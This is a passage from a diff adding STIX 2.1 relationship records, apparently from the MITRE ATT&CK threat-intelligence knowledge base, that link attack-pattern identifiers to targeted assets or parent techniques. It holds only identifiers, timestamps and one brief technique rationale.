"relationship--bac91d7e-0c80-4cdd-a42f-a89aa5dfd2df", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bad056aa-b8a6-4c4c-9bfa-bcc518872341", + "created": "2024-03-25T20:17:36.433Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-25T20:17:36.433Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--baeaf95e-35be-44df-8e65-95480d066550", + "created": "2021-10-08T14:06:28.307Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--baedd4b3-1fc9-4056-a282-322496a3cceb", + "created": "2020-02-10T19:49:46.844Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb02d355-927e-4f4b-9b92-521ba3fb74d0", + "created": "2024-06-27T09:10:50.984Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:10:50.984Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb10f3b6-31f9-424c-b72a-93ed79a78da3", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb13c130-8e37-4e34-8724-1bf83b8254e5", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb194990-6c36-4a00-a605-a41f30e369a0", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb1fb0c8-49f9-463c-b039-68636d507b80", + "created": "2020-03-06T21:11:11.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb20fdf4-f214-417a-b785-9c2c6f90722f", + "created": "2022-03-28T15:34:44.696Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", + "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb33e2e0-015c-42e9-a8b5-e1d3f1043e1f", + "created": "2024-05-23T04:06:08.376Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:13:07.771Z", + "description": "Asset Mapping Rationale: Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key.", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb3938a6-85ec-4f34-8bcd-6051de7e9259", + "created": "2023-09-29T16:45:08.209Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:45:08.209Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb611cd0-6646-4090-82ea-96ca4440afb7", + "created": "2020-12-18T16:33:13.341Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb6f2e41-2f67-49e7-ade1-490abeb9274a", + "created": "2021-04-23T01:04:57.258Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", + "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb9c7438-e1f2-4c3b-bef4-93dc732bc13d", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bb9d911d-aa38-4c35-a54f-862e75431cc8", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bba3fad2-4897-4cde-862f-5f070f629a58", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bbce187b-a26d-41d0-8f6c-a924663ccc56", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bbddae2e-69d5-4b4f-a091-42d12075e007", + "created": "2020-03-14T22:34:03.218Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bbddff60-386c-4c17-b3aa-8d2960adc3db", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bbeb2eae-7da2-4477-ad8e-8c67b00c53bc", + "created": "2023-09-28T19:53:44.848Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:53:44.848Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bbeb73db-f1df-4199-8844-8e4c0c2eeb3d", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bbf33c27-569c-4005-b047-63b8ec4e6a22", + "created": "2020-01-31T19:00:56.776Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bbf81599-c310-4655-9d0b-55ddb3d5da90", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bc01880d-f538-4b18-bb7a-00b9a9a929a4", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bc07156b-a689-41a5-9cd6-9ae2ac4dd83a", + "created": "2024-06-27T09:16:34.204Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:16:34.204Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bc23089f-eded-43ca-9a2d-6aaa5737aab5", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bc25f400-2af5-4493-98be-c69e782f2b9e", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bc3a0b1f-f0ec-466f-8cad-8f47b07764c9", + "created": "2023-09-28T21:22:21.776Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:22:21.776Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bc40a2e9-4339-43ca-90ed-6db69f83ccc3", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bc4204a4-1770-4213-a9f8-0a6767b04686", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bc46ec8d-e911-49f7-9401-6e5f976f27b8", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bc6880d8-6e09-4273-9265-93acb959a5ed", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bccb7ac3-c374-445b-aad2-14991a8641e5", + "created": "2020-03-16T15:45:18.139Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bcd82fc6-6a06-4103-b855-e2da28d0b350", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bcdb80d6-8ae4-4283-8abd-e933b498be13", + "created": "2020-02-11T18:26:02.003Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--ffe742ed-9100-4686-9e00-c331da544787", + "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bced764f-e4f1-43d0-af3b-ae93d607041a", + "created": "2020-03-16T15:23:31.073Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--bcf189fe-94dd-4b46-b52a-6eb4c38e0335", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": 